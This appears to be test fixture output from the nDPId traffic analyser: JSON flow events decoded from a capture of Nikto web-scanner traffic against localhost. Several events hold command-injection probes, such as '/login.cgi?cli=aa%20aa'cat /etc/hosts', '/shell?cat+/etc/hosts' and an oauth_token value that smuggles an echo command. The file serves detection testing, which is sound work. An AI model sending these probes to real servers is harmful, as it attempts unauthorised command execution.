{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} 
+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
